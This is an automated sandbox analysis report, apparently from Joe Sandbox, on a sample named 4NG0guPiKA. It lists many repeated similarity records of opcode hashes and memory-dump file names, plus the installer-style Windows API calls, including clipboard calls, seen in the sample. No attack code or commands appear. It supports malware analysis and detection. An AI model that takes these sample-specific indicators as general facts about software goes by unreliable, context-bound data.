• Opcode ID: 491185a1f3f329195e65077e675afbe56f554cd7f0c7591006fbb5a7bb70aae4
• Instruction ID: a7e4cbad145a63de6844c8bf782b9c11e1d85f480274e35df8d410c59babf7d6
• Opcode Fuzzy Hash: 491185a1f3f329195e65077e675afbe56f554cd7f0c7591006fbb5a7bb70aae4
• Instruction Fuzzy Hash: 32C1BD74E01218CFEB14DFA9C994B9DBBB2BF89300F2081A9D409BB355DB359A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6daab3c9f829b2e8eb7eaf0b22d26245a574dc11a4f18f59b5659eb73175af3
• Instruction ID: 9fd19d0e8f311c0288e685227adcf2f62aa7d60d9bcdbb180f05c4cb92e00da8
• Opcode Fuzzy Hash: e6daab3c9f829b2e8eb7eaf0b22d26245a574dc11a4f18f59b5659eb73175af3
• Instruction Fuzzy Hash: 1EC1AE74E00358CFEB14DFA9C994B9DBBB2AF89300F1081A9D409BB365DB359A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ec407e03ce692f438b2909a3381e008e315f8e9195d0a443aa22e5ba90eabc3
• Instruction ID: 3ba28145effb127195c7fdd3763d23bfe787f4298016f59ca0403967a3b02416
• Opcode Fuzzy Hash: 9ec407e03ce692f438b2909a3381e008e315f8e9195d0a443aa22e5ba90eabc3
• Instruction Fuzzy Hash: 68C1A074E00358CFEB14DFA9C994B9DBBB2AF89300F2081A9D409BB355DB359A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8f85badff1301c238b363dfe64a7ba050ffa71dc952eaee265a7a60b55fad61e
• Instruction ID: ee2d15aab83d0a5b5c840c059432ec0fe4c5b5d0cfc6641a310404f7ef824a0a
• Opcode Fuzzy Hash: 8f85badff1301c238b363dfe64a7ba050ffa71dc952eaee265a7a60b55fad61e
• Instruction Fuzzy Hash: 4AC19F74E00358CFEB14DFA9C994B9DBBB2AF89300F1081A9D409BB365DB359A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b8b33a3b1380dacb5d349396bcfa461f7c9ab56c54dacb30950a13c5439e0d73
• Instruction ID: 8183be1b14a02764a635b2e3f3456350df56b00a21d6a6422938b5064e70ecbc
• Opcode Fuzzy Hash: b8b33a3b1380dacb5d349396bcfa461f7c9ab56c54dacb30950a13c5439e0d73
• Instruction Fuzzy Hash: 28C1AE74E00358CFEB14DFA9C994B9DBBB2AF89300F2081A9D409BB355DB759A85CF14
Memory Dump Source
• Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff0b290b69588aa91a5297119221b4dc9f7c924fc2b427e86b109b826e5c4e6c
• Instruction ID: d69aadb7f33c59f77d8735ce9d8a0ee8d6561d0bbeab26cb47600bc9ea1e6f40
• Opcode Fuzzy Hash: ff0b290b69588aa91a5297119221b4dc9f7c924fc2b427e86b109b826e5c4e6c
• Instruction Fuzzy Hash: DCC1A074E00358CFEB14DFA9C994B9DBBB2AF89300F1081A9D409BB365DB359A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39a0d650368f56e52ac8d5445a42404923627b15e2f8d3cd7039ec0043f55144
• Instruction ID: 580b4a34a49cfe93cb512a394678072b8d6b774c2657e62507f1a8be6ce1c3d3
• Opcode Fuzzy Hash: 39a0d650368f56e52ac8d5445a42404923627b15e2f8d3cd7039ec0043f55144
• Instruction Fuzzy Hash: B0C1BF74E00218CFEB14DFA9C994B9DBBB2BF89300F1081A9D409BB355DB759A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ce8c79308ab802315b699d16d83a5d12f0022a15d7937866ba03609e62c22b69
• Instruction ID: 03538fc65724ee77b3f2dabd11796bd1f4c66a556ece6bc63366119aca61fd09
• Opcode Fuzzy Hash: ce8c79308ab802315b699d16d83a5d12f0022a15d7937866ba03609e62c22b69
• Instruction Fuzzy Hash: E6C1BE78E00318CFEB14DFA9C994B9DBBB2BB89300F5081A9D409BB355DB359A85CF14
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41d89cda99d5cf8ea0fde2594fa2402dd6c4d0835c27d7e42b524f449f20ca5c
• Instruction ID: ce4df075cdb98341ffe66360f05acfabaefa9f1d556c0aa42ef552595b021922
• Opcode Fuzzy Hash: 41d89cda99d5cf8ea0fde2594fa2402dd6c4d0835c27d7e42b524f449f20ca5c
• Instruction Fuzzy Hash: 2AC1B074E01358CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB359A81CF14
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aa7915f670f3045518761125107310aab453b0ae3d68e484cc67851df55bad7e
• Instruction ID: 7a8563cafece0856eeee2965d40eadfad0378a1c4fed0bdd38237ed964646a5a
• Opcode Fuzzy Hash: aa7915f670f3045518761125107310aab453b0ae3d68e484cc67851df55bad7e
• Instruction Fuzzy Hash: 8CC1AF78E00358CFDB14DFA9C994B9DBBB2AF89300F1081A9D809BB355DB759A81CF54
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80033e7f6049baabf88621df4ab0eb4eac9f4e6db5459a31f4ddc65ca71a9cad
• Instruction ID: 36e4f7d2ca36825eae047c02778dd585a690d48131650ad29f047972ebb5f8e5
• Opcode Fuzzy Hash: 80033e7f6049baabf88621df4ab0eb4eac9f4e6db5459a31f4ddc65ca71a9cad
• Instruction Fuzzy Hash: A3C1BE78E00358CFEB14DFA9C994B9DBBB2AB89300F1081A9D409BB355DB359A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb61db1cdebf126a87ab810188d1cd62eeffa860c8ae7993de90a9aa8caa3828
• Instruction ID: ddfe90491b4fcbf91abce78634d782ffeda4385732c36300f9b1619aad907ad4
• Opcode Fuzzy Hash: eb61db1cdebf126a87ab810188d1cd62eeffa860c8ae7993de90a9aa8caa3828
• Instruction Fuzzy Hash: 97C1AF78E00358CFDB14DFA9C994B9DBBB2BB89300F2081A9D409BB355DB359A81CF54
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cdaf339ec6205a8e656c1fabbe9eb0841807a4e5f868868e1241e6bef222fbc6
• Instruction ID: feed5c45db3668b7e359ce48bfabce30817860d5dad2dc142d6b974e82821b20
• Opcode Fuzzy Hash: cdaf339ec6205a8e656c1fabbe9eb0841807a4e5f868868e1241e6bef222fbc6
• Instruction Fuzzy Hash: E3C1AE78E00218CFDB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB359A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c2cd1d1b1eb4934239bf9ac1f0c5efae736ab4e1894e38a49b3bcceb5f69b2c6
• Instruction ID: 3c6f8539e8b240f6b09c268794d9db46dfcbd3b586f23b1ac561f27dad151694
• Opcode Fuzzy Hash: c2cd1d1b1eb4934239bf9ac1f0c5efae736ab4e1894e38a49b3bcceb5f69b2c6
• Instruction Fuzzy Hash: 74C1AE78E00358CFEB14DFA9C994B9DBBB2AB89300F1081A9D409BB355DB359A81CF14
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f4bdf300de0f01ef92e07ae5bff5aa3da1fb60612aca6664a0f2dc663ab6329
• Instruction ID: 0b6d10d0c47f6e2bd8f2151c1ab6bce51b6581ea27a8c1c8b4ad2adc24e98145
• Opcode Fuzzy Hash: 4f4bdf300de0f01ef92e07ae5bff5aa3da1fb60612aca6664a0f2dc663ab6329
• Instruction Fuzzy Hash: 78C1AE78E00318CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 651983635736e6b2c13e3d62fcc80bbdd74969bf0cf6d04c44dff3ae571a32e8
• Instruction ID: ba404e2b93285434a7c9557391b3d4152502bb2b59bc6e8b9acd2fdee2a037ff
• Opcode Fuzzy Hash: 651983635736e6b2c13e3d62fcc80bbdd74969bf0cf6d04c44dff3ae571a32e8
• Instruction Fuzzy Hash: 96C1BD78E00318CFEB14DFA9C994B9DBBB2AF89300F1081A9D409BB355DB759A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 62b28dfc00b773e2037d77148f76cdcb04f8631f9e64d2c5c17d29c6700e29e2
• Instruction ID: fb7d6362d623be51ee4e91d55bc166ccf0cd822b0f1e69983cc4eac84be05ec5
• Opcode Fuzzy Hash: 62b28dfc00b773e2037d77148f76cdcb04f8631f9e64d2c5c17d29c6700e29e2
• Instruction Fuzzy Hash: 44C1AF78E00318CFDB14DFA9C994B9DBBB2AB89300F1081A9D409BB395DB759A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4ddfa73acb123142464398363262bb0a2f9e58889b547f8436b8896a316835ca
                                                                                                            • Instruction ID: 7b2fc05aa59b0a96421d0cc29d6fc0022f8bba398272d4c61b687300b8d0ba40
                                                                                                            • Opcode Fuzzy Hash: 4ddfa73acb123142464398363262bb0a2f9e58889b547f8436b8896a316835ca
                                                                                                            • Instruction Fuzzy Hash: FBC1AE78E00318CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8e3eb9151a3602c25a20800c3afa01190b082e846cd44bb1df91fd16210ce959
                                                                                                            • Instruction ID: c59d825fe358f1250f6a11850c240e6b6b827d6759f7765b949b37f92ffb80ed
                                                                                                            • Opcode Fuzzy Hash: 8e3eb9151a3602c25a20800c3afa01190b082e846cd44bb1df91fd16210ce959
                                                                                                            • Instruction Fuzzy Hash: 17C1BF78E00358CFDB14DFA9C994B9DBBB2BB89300F1081A9D409BB395DB359A85CF14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 230d6a9c714542d0b2e9030b02b15809942ce0f6d6c355fc6d0d68c1ce713c70
                                                                                                            • Instruction ID: c796f2b892230162d1d409f8d64f44ec06a3ff3521578438aff51acd5d00b30d
                                                                                                            • Opcode Fuzzy Hash: 230d6a9c714542d0b2e9030b02b15809942ce0f6d6c355fc6d0d68c1ce713c70
                                                                                                            • Instruction Fuzzy Hash: 50C1AE78E00258CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 417331bbee76d3a98bfcac508686336d18b2cf4ce08ecde0e67f773980c4b2de
                                                                                                            • Instruction ID: 2d39ecba9290a941f88307fcfbc5f650c52412f450168482840b3fbc4662296c
                                                                                                            • Opcode Fuzzy Hash: 417331bbee76d3a98bfcac508686336d18b2cf4ce08ecde0e67f773980c4b2de
                                                                                                            • Instruction Fuzzy Hash: 89C1AE78E00358CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9f196d2f5e892d50a085d118b952e57453e526075d022f9c273e6446f78cdbf5
                                                                                                            • Instruction ID: 7b8b2cd2e5f3102e7f437d9fb6988426ebc4dbb6f1c1bb8c4d964a3edec2da2e
                                                                                                            • Opcode Fuzzy Hash: 9f196d2f5e892d50a085d118b952e57453e526075d022f9c273e6446f78cdbf5
                                                                                                            • Instruction Fuzzy Hash: 0BC1AE78E01318CFEB14DFA9C994B9DBBB2AF89300F1081A9D409BB355DB359A85CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 44853bffe421f5f0270b1d4bec1a4570d520d12c289b83f73b0ecc210a8d442c
                                                                                                            • Instruction ID: edba836747228c8c96095007acdddec83759dfc2029fe127ae884fb6cfe31a58
                                                                                                            • Opcode Fuzzy Hash: 44853bffe421f5f0270b1d4bec1a4570d520d12c289b83f73b0ecc210a8d442c
                                                                                                            • Instruction Fuzzy Hash: 27C1AE78E00358CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB359A85CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c49e2d27e666b0f98794ae0f1bb24e56a40ed951774664979e95ba4440cbad0b
                                                                                                            • Instruction ID: 7e06e6c0a99762935d7ea421329d9723d99d9c15698b0b2c32d4ae268c1d60f3
                                                                                                            • Opcode Fuzzy Hash: c49e2d27e666b0f98794ae0f1bb24e56a40ed951774664979e95ba4440cbad0b
                                                                                                            • Instruction Fuzzy Hash: 70C1AE78E00258CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A81CF14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f431f52d7c5bc0493a9e8d170fea7b85717492ec807677275b44d1f89c051733
                                                                                                            • Instruction ID: d88fb68223d34c1aa71bfd6f50e2263622080b9b7ec71e9b6f668a56017ccdc9
                                                                                                            • Opcode Fuzzy Hash: f431f52d7c5bc0493a9e8d170fea7b85717492ec807677275b44d1f89c051733
                                                                                                            • Instruction Fuzzy Hash: 79C1AE78E00358CFEB14DFA9C994B9DBBB2AB89300F1081A9D409BB355DB359A81CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ed79127b65fa617f64ed69414a81d1cd5538a4a8816e9f52588004dd0fbb0a11
                                                                                                            • Instruction ID: ac73e84a5852685bedb4d65a9a1d9a05877e3f772bbd79714c463cbc0bd75a30
                                                                                                            • Opcode Fuzzy Hash: ed79127b65fa617f64ed69414a81d1cd5538a4a8816e9f52588004dd0fbb0a11
                                                                                                            • Instruction Fuzzy Hash: 1FC1BF74E00358CFDB14DFA9C994B9DBBB2BB89300F1081A9D409BB395DB759A85CF14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e97d3644b3b55e87ab382b893d621db1a80fb4adbc4b0f6cf8cdcec69ba0ab97
                                                                                                            • Instruction ID: 33ec0dd5d0b5801fc40636c24da42ccf86fa49c5be9f6390d6a70dee0441e39f
                                                                                                            • Opcode Fuzzy Hash: e97d3644b3b55e87ab382b893d621db1a80fb4adbc4b0f6cf8cdcec69ba0ab97
                                                                                                            • Instruction Fuzzy Hash: B0C1BE78E00318CFDB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0db3084b1d7dcae003f1320d0ceac50e94c6b9716d113ef1da1f686277b0737c
                                                                                                            • Instruction ID: 32fd2d63f7c8ef871a05b7c1bc82f666c81a25c4cd2b8426926c16a2a8af1082
                                                                                                            • Opcode Fuzzy Hash: 0db3084b1d7dcae003f1320d0ceac50e94c6b9716d113ef1da1f686277b0737c
                                                                                                            • Instruction Fuzzy Hash: B6C1AF74E00358CFDB14DFA9C994B9DBBB2BB89300F1081A9D409BB395DB359A85CF14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d58ec96d618f56c2dcc31b90239379804705407894a36105f3b7c732f3348391
                                                                                                            • Instruction ID: 495b32bad8522292c0f99c7f88fa7bd17d64e23c68e0f46092b83e483ffecc18
                                                                                                            • Opcode Fuzzy Hash: d58ec96d618f56c2dcc31b90239379804705407894a36105f3b7c732f3348391
                                                                                                            • Instruction Fuzzy Hash: F2C1A078E00358CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f5b254fda1c5f86a102704fb9b550bdaffd79622f386aaf0aa674ddd0634cee1
                                                                                                            • Instruction ID: 4834bc8a0c74ecb6c62536e19f41f23ec2234aaf4cad8d026d3cea6f794c5129
                                                                                                            • Opcode Fuzzy Hash: f5b254fda1c5f86a102704fb9b550bdaffd79622f386aaf0aa674ddd0634cee1
                                                                                                            • Instruction Fuzzy Hash: A9C19D74E00358CFEB14DFA9C994B9DBBB2AF89300F2081A9D409BB355DB359A85CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3844615d2cb9e472d5a5a12195face68f1766b20da3192d1dd94fb5eb6a21fb6
                                                                                                            • Instruction ID: 0de3b58f85f8d362d49fe1851d50e46062f341df27f85f5ab646d6335d2d579c
                                                                                                            • Opcode Fuzzy Hash: 3844615d2cb9e472d5a5a12195face68f1766b20da3192d1dd94fb5eb6a21fb6
                                                                                                            • Instruction Fuzzy Hash: 14C19D74E01218CFEB14DFA9C994B9DBBB2BF89300F2081A9D409BB355DB359A85CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 76dbe83a5de802571f6da02f38a835c82aaabb2b51fbeeb61ce874ab82a1627d
                                                                                                            • Instruction ID: bb19691eb4dfd721c434ab59959f92400a74a3094634e52063f420e0adf8ce2c
                                                                                                            • Opcode Fuzzy Hash: 76dbe83a5de802571f6da02f38a835c82aaabb2b51fbeeb61ce874ab82a1627d
                                                                                                            • Instruction Fuzzy Hash: 6AC19E74E01318CFEB14DFA9C994B9DBBB2AF89300F2081A9D409BB355DB359A85CF54
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                            • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                                              • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                            • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                            • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                            • CreatePopupMenu.USER32 ref: 00405562
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                            • EmptyClipboard.USER32 ref: 004055FD
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                            • CloseClipboard.USER32 ref: 00405658
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
